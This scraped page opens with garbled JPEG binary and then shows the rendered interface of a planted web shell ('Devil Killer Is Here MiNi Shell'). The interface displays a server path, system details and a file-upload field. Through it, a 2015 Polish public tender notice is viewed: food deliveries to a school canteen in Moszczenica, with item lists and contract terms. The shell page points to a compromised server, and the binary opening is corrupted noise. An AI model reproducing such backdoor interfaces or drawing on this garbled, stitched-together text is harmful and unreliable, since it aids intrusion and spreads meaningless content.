JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151207/332062-N-2015.html

<p class="kh_header"><b>Moszczenica: Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej  w  Szkole Podstawowej im. św. Stanisława Kostki w Moszczenicy,  pow. piotrkowski, woj. łódzkie.</b><br>
<b>Numer ogłoszenia: 332062 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa  im. św. Stanisława Kostki w Moszczenicy , ul. Dworcowa 9, 97-310 Moszczenica, woj. łódzkie, tel. 44 616 95 00, faks 44 616 95 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp.moszczenica.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej  w  Szkole Podstawowej im. św. Stanisława Kostki w Moszczenicy,  pow. piotrkowski, woj. łódzkie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa  artykułów spożywczych do stołówki szkolnej na potrzeby wyżywienia uczniów i dzieci w Szkole Podstawowej im. św. w Moszczenicy, Dworcowa 9, 97 - 310 Moszczenica.

FORMULARZ OFERTOWY SZCZEGÓŁOWY  

ARTYKUŁY SPOŻYWCZE SUCHE  , PRZYPRAWOWE I PRZETWORY OWOCOWO-WARZYWNE, PRODUKTY GARMAŻERYJNE	 	 	 	 	 	 	 
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT %	Wartość netto  
	 Wartość brutto


1	2	3	4	5	6	7	8	9

1	Cukier kryształ biały 1kg	kg	200					
2	Soki 430 ml	szt.	100					
3	Dżem owocowy niskosłodzony słoik o zawartości nie mniej niż 40% 280g	szt.	250					
4	Groch łupany  400 g 	kg	60					
5	Groszek konserwowy puszka 400g	szt.	30					
6	Ogórek konserwowy w słoiku 870 ml	szt.	120					
7	Aromat waniliowy 10 ml.	szt.	20					
8	Cukier puder 0,4 kg	szt.	30					
9.	Jajka kurze kl. A	szt.	6500					
10.	Koncentrat pomidorowy 30% 215 g	szt.	290					
11.	Kasza jęczmienna średnia  1kg	kg	25					
12.	Barszcz czerwony w proszku  Winiary 60 g             	kg	130					
13.	Proszek do pieczenia 30g	szt.	20					
14.	Zupa grzybowa 48 g	szt.	100					
15.	Cynamon 27g	szt.	20					
16.	Cukier waniliowy 32 g	szt.	35					
17.	Chrzan 290 g	szt.	25					
18.	Mąka pszenna 1kg	kg	420					
19.	Majeranek 10 g	szt.	45					
20.	Przyprawa do zup płynna 200 g	L	100					
21.	Majonez 600 g	szt.	45					
22.	Olej spożywczy rzepakowy 1 l. szt. 380					
23.	Pieprz czarny mielony 20g-25g	szt.	120					
24.	Ryż biały  1kg	kg	110					
25.	Sól sodowo-potasowa 1kg	kg	120					
26.	Sos do spaghetti torebka 45-51 g	szt. 	80					
27.	Zupa barszcz biały Winiary 42-66 g	szt. 	50					
28.	Barszcz biały butelka 0,4l	szt.	160					
29.	Fasola Jaś średnia 1 kg	kg	130					
30.	Kostki rosołowe drobiowe 180g	szt. 	60					
31.	Kwasek cytrynowy 20g	szt.	50					
32.	Przyprawa wieloskładnikowa warzywna sypka do potraw 200g szt.	120	
33.	Kasza manna 1 kg	kg	90					
34.	Mąka ziemniaczana1 kg	kg	10					
35.	Żurek w torebce Winiary 49 g	szt. 	80					
36.	Kisiel Winiary 77 g	szt.	150					
37.	Zupa pieczarkowa Delekta 50 g 	szt. 	100					
38.	Sos ciemny pieczeniowy Winiary 30 g	kg	180					
39.	Makaron kolanko z falbanką 1 kg	szt.	130					
40.	Makaron spaghetti  0,4 kg	szt.	250					
41.	Makaron świderki 1kg	kg	300					
42.	Makaron rurka Lubella 0,4 kg	szt.	120	
43.	Makaron do rosołu Czaniec 0,5 kg	szt.	100			
44.	Makaron muszelki Lubella 400 g	szt.	160					
45.	Makaron zacierka Goliard 0,25 kg	szt. 	160			
46.	Sos do sałatek różne smaki Knorr 9 g	szt.	130	
47.	Rodzynki 100 g	szt. 	40		
48.	Sos do potraw chińskich Łowicz  520 g	szt.	50	
49.	Sos do spaghetti Łowicz - 520 g	szt. 	130	
50.	Pieprz ziarnisty 20 g	szt. 	20			
51.	Delikat do mięs Knorr 200 g szt.	65				
52.	Przyprawa Złocisty kurczak 40 g	szt.	50			
53.	Koncentrat buraczany Pińczów 330 ml	szt. 	70		
54.	Kasz jęczmienna gruba 1 kg	kg	100		
55.	Czosnek granulowany     20 g	szt.	40		
56.	Fasola Jaś drobny 1 kg	szt.	40			
57.	Pierogi z serem 0,45 kg	kg 	200			
58.	Pierogi z mięsem 0,45 kg	kg	130				
59.	Pierożki delikatesowe (uszka) 0,3 kg	kg	70				
60.	Pierogi z kapustą i mięsem 0,45 kg	kg	200				
61.	Kopytka 0,45 kg	kg	280				
62.	Kluski leniwe 0,45 kg	kg	200					
63.	Koncentrat szczawiowy Łowicz 330 g	szt.	60					
64.	Sos słodko-kwaśny Łowicz 520 g	szt.	60					
65.	Płatki kukurydziane Lubella 500 g	kg	8					
66.	Ziele angielskie Interjarek 15 g	szt.	20					
67.	Galaretka (różne smaki) Delecta 75 g	szt.	170					
68.	Budyń - różne smaki Delecta 64 g	szt.	130					
69.	Liść laurowy Interjarek 8 g	szt. 	25					
70.	Sos myśliwski Winiary 30 g	szt.	30			
71.	Kasza jęczmienna pęczak	kg	40					
72.	Makaron łazanki Lubella 500 g	kg	30					
73.	Kasza jaglana Kupiec 0,4 kg	kg	30					
74.	Kasza gryczana Eska 0,5 kg	kg	30					
75.	Ryż brązowy Kupiec 4x100g	kg	20					
76.	Makaron pełnoziarnisty rurki Lubella 0,4 kg	kg	30				
77.	Makaron pełnoziarnisty Lubella świderki 0,4 kg	kg	40			
78.	Oliwa z oliwek Basso 250 ml	szt.	10					
79.	Musztarda sarepska Devaley 210g	szt.	20					
80.	Miód pszczeli lipowy Barć 1250g	szt.	3					
81.	Płatki migdałowe Sjesta 60g	szt.	10					
82.	Oregano Prymat 10g	szt.	40					
83.	Bazylia Kamis 10g	szt.	40					
84.	Zioła prowansalskie Kamis 10g	szt.	40					
85.	Tymianek Kamis 10g	szt.	40					
86.	Pieprz cytrynowy Kamis 20g	szt.	20					
87.	Przyprawa curry Apetita 20g	szt.	20					
88.	Przyprawa gyros Kamis 30g	szt.	20					
89.	Przyprawa lubczyk Prymat 10g	szt.	10					
90.	Soki owocowe Hortex Scoby-Doo 200 ml	szt.	1350				
91.	Woda mineralna Jurajska Junior 0,33 l	szt.	1350					
93.	Soki owocowe Hortex Tygrysek 200 ml	szt.	1350					
94.	Przyprawa kebab Kamis 25g	szt.	20					
95.	Sos myśliwski Łowicz 520g	szt.	30					
96. 	Przyprawa rozmaryn Kamis 15g	szt.	10					

NABIAŁ 	 	 	 	 	 	 
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT %
1	2	3	4	5	6	7
1.	Masło śmietankowe o zawartości nie mniej niż 67% 250g	szt.	160	
2.	Mleko 2% 1L	L	850			
3.	Śmietana 12% 400g Hej	l	1400			
4.	Serek topiony o zawartości tłuszczu nie mniej niż 25% Hochland 100g	kg	40			
5.	Twaróg biały półtłusty Czrnocin  1 kg	kg	200			
6.	Ser żółty pełnotłusty Gouda  1kg lub równoważny	kg	60			
7.	Kefir  Czarnocin 400 ml	szt.	160			
8.	Kefir Czarnocin  150 g	szt.	2700			
9.	Zsiadłe mleko 200 ml	szt.	820		
10.	Ser Feta	szt.	30		
11. 	Ser parmezan	kg	30			
12.	Ser mozzarella	kg	40		
13.	Jogurt naturalny Czarnocin    150 g	szt.	5700			
14.	Jogurt naturalny Czarnocin    370 g 	szt.	80			

PIECZYWO	 	 	 	 	 	 						
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT % Wartość netto 
Wartość brutto

1	2	3	4	5	6	7	8	9

1.	Bułka zwykła 100g	szt. 	600					
2.	Bułka tarta 1kg	kg	150					
3.	Chleb krojony pszenno-żytni jasny 600g-900g	szt.	750			
4.	Chleb żytni	szt. 	100					
5.	Drożdże 100 g	kg	20		
			
WARZYWA i OWOCE
	 	 	 	 	 	 	 		
Lp.	
Nazwa artykułu i gramatura opakowanie	
Jednostka	
Ilość 	Cena  netto za jednostkę	Stawka VAT %	Wartość netto 	 Wartość brutto

1	2	3	4	5	6	7	8
1	Ziemniaki jadalne typu kulinarnego (irga,bryza)	kg	6000			
2	Kapusta biała świeża	kg	460				
3	Marchew korzeń	kg	620				
4	Cebula biała korzeń	kg	100				
5	Pieczarki gat I	kg	150				
6	Rzodkiewka	pęczek	120				
7	Ogórek  zielony świeży	kg	200				
8.	Buraki czerwone świeże	kg	400				
9.	Kapusta kwaszona	kg	400				
10.	Jabłka gat. I	kg	2200				
11.	Kapusta pekińska świeża	kg	130				
12.	Fasola czerwona konserwowa 400 g	szt.	25				
13.	Seler korzeń	kg	280				
14.	Pomidory świeże	kg	50				
15.	Sałata zielona	szt.	300				
16.	Kapusta czerwona świeża	kg	180				
17.	Por 	szt.	250				
18.	Koper zielony świeży	pęczek	50				
19.	Pietruszka korzeń	kg	240				
20.	Kalafior 	szt	180				
21.	Banany 	kg	1200				
22.	Papryka świeża czerwona	kg	20				
23.	Ogórek kiszony	kg	400				
24. 	Mandarynki 	kg	650				
25. 	Pomarańcza 	kg	480				
26.	Kukurydza konserwowa 400 g	szt. 	30				
27.	Nektarynki	kg	360			
28.	Gruszki	kg	370			
29.	Czosnek główka	szt.	20				
30.	Natka pietruszki	pęczek	30				
31.	Arbuz	kg	100				
32.	Brzoskwinia	kg	300				
33.	Ananas świeży	szt.	120				
34.	Cukinia	kg	10				
35.	Kiwi	kg	300				
36.	Śliwki Węgierki	kg	250				
MROŻONKI i RYBY	 	 	 	 	 	 	 
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę 	Stawka VAT %Wartość netto 
Wartość brutto

1	2	3	4	5	6	7	8	9
1.	Fasolka szparagowa 450g	szt.	220					
2.	Kalafior  450 g	szt.	220					
3.	Mieszanka jarzynowa 8-składnikowa 450g	szt.	200				
4.	Marchew mrożona mini 450 g	szt.	190					
5.	Mieszanka kompotowa o,45 kg	szt.	320					
6.	Ryby(filet bez ości, bez glazury, bez skóry-morszczuk)kg	kg	150	
7.	Filet z miruny bez skóry	kg	590					
8.	Dorsz - płaty	kg	180					
9. 	Sola - płaty	kg	150					
10.	Brokuły 450 g	szt.	200					
11.	Brukselka 450 g	szt.	100					
12.	Truskawka mrożona o,45 kg	szt.	150					
13.	Wiśnie mrożone 0,5 kg	szt. 	120					
14.	Barszcz ukraiński 450 g	szt.	100		
15.	Mieszanka chińska 450 g	szt.	60				
16.	Marchew mrożona kostka 45o g	szt.	35				
17.	Frytki 2,5 kg	szt.	180				
18.	Szpinak mrożony Iglotex 0,45 kg	szt.	40					
19.	Groszek zielony mrożony Iglotex       0,45 kg	szt.	30
MIĘSO, PRZETWORY WIEPRZOWO-WOŁOWE 
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Cena netto za jednostkę	VAT %	Wartość netto 
	 Wartość brutto
1	2	3	4	5	6	7	8
1	Boczek wędzony nieparzony	kg	35				
2	Kiełbasa wiejska* cienka o zawartości mięsa nie mniej niż 60%	kg	260				
3	Karczek b/k wieprzowy	kg	600				
4	Żeberka 	kg	250				
5	Mortadela	kg	190				
6	Mięso mielone	kg	550				
7	Antrykot	kg	50				
10.	Boczek surowy	kg	80				
11.	Schab z/k wieprzowy	kg	650				
12.	Golonka	kg	25				
13.	Wołowina b/k	kg	220				 	 	 	 
produkty z wykluczeniem mięsa mechanicznie odkostnionego.                            
MIĘSO DROBIOWE	 	 	 	 	 	 	 
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Cena  netto za jednostkę	 VAT %	Wartość netto 
Wartość brutto
1	2	3	4	5	6	7	8
1.	Filet z kurczaka surowy	kg	330				
2.	Kurczak	kg	350				
4.	Udziec z kurczaka	kg	550				
5.	Porcja rosołowa b/skrz.	kg	180				
6.	Wątróbka drobiowa	kg	150				
7.	Mięso mielone drobiowe	kg	120				
                                                                                            
Informacje dodatkowe:
1.Wykonawca zobowiązuje się sukcesywnie dostarczać dla Zamawiającego artykuły spożywcze przedstawione w szczegółowych formularzach cenowych stanowiących załączniki nr od 1-7  od 01.01.2016 roku do 31.12.2016 roku
2. Realizacja dostaw odbywać się będzie od poniedziałku do piątku w godzinach:
Zadanie 1  (artykuły spożywcze suche, przyprawowe i przetwory owocowo-warzywne) 
- 3 razy w tygodniu od godz. 7.00 do godz. 7.30
Zadanie 2  ( nabiał ) -  codziennie od godz.6.30 do godz. 7.30
Zadanie 3  ( pieczywo ) - codziennie od godz.6.30 do godz. 7.30
Zadanie 4  ( warzywa i owoce ) - codziennie od godz.6.30 do godz. 7.30
Zadanie 5  ( mrożonki i ryby ) - 2 razy w tygodniu od godz. 6.30 do godz. 7.30
Zadanie  6 ( mięso, przetwory wieprzowo- wołowe i drobiowe )
 -  codziennie od godz. 7.00 do godz. 7.30
Zadanie 7 ( mięso drobiowe )  -  1 raz w tygodniu od godz. 7.00 do godz. 7.30
z tolerancją  + 30 minut dnia następnego od przekazania zamówienia w formie pisemnej, elektronicznie, faksem lub  po telefonicznym uzgodnieniu.
3. Towar będzie dowożony przez Wykonawcę własnym transportem, na jego koszt, w odpowiednich opakowaniach zapewniających właściwe zabezpieczenie przewożonych artykułów wraz z jego rozładunkiem do magazynu Zamawiającego.
4. Każdorazowa dostawa musi być zgodna pod względem jakościowym i ilościowym z bieżącym zamówieniem Zamawiającego, potwierdzona i odebrana przez upoważnionego przedstawiciela Zamawiającego tj: intendenta lub osobę pisemne upoważnioną przez Dyrektora placówki.
5. Wykonawca przy każdej dostawie zobowiązany jest do dołączenia dokumentu magazynowego (dowodu dostawy lub dokumentu WZ) z wyszczególnieniem produktów i ich ilości oraz faktury VAT .
6. Za datę wykonania poszczególnej dostawy, uważa się datę przyjęcia zamówionych artykułów  bez zastrzeżeń .
7.  Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia ilości artykułów w stosunku do ilości określonych w szczegółowym formularzu cenowym stanowiącym załącznik do oferty nr 1,2,3,4,5,6 i 7 bądź rezygnacji z niektórych artykułów w zależności od liczby żywionych osób i jadłospisów obowiązujących u Zamawiającego w okresie obowiązywania umowy. Nie może to stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek roszczeń.
8. Zamawiającemu będzie przysługiwać prawo składania reklamacji dotyczących ilości 
i   jakości dostarczanych artykułów z żądaniem ich wymiany lub uzupełnienia.
9. Wykonawca dokona uzupełnienia lub wymiany towaru w ciągu jednej godziny na towar wolny od wad. Zamawiający nie odpowiada za straty poniesione przez Wykonawcę z tego tytułu.
10. Wykonawca zobowiązuje się do dostarczenia artykułów spożywczych, towarów 
w pierwszej jakości, odpowiadających aktualnym normom jakościowym.
Kod CPV 03221000-6, 03222300-6, 15811000-6, 15331170-9, 03142500-3, 15800000-6, - 15100000-9, 15500000-3, 15889600-5..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3, 15.88.96.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy, wypełniony formularz cenowy dla danej części zamówienia, oświadczenie z art. 22 ust. 1 ustawy, Pełnomocnictwo (o ile w imieniu wykonawcy działa pełnomocnik),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Zamawiający przewiduje zmiany zawartej umowy w przypadku m.in. zaistnienia następujących okoliczości:
1. W przypadku zmiany osób związanych z obsługą  administracyjno - organizacyjną, a uczestniczących w wykonaniu niniejszego zamówienia wymaga aprobaty stron umowy, natomiast nie wymaga sporządzenia aneksu.
2. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w następujących przypadkach:
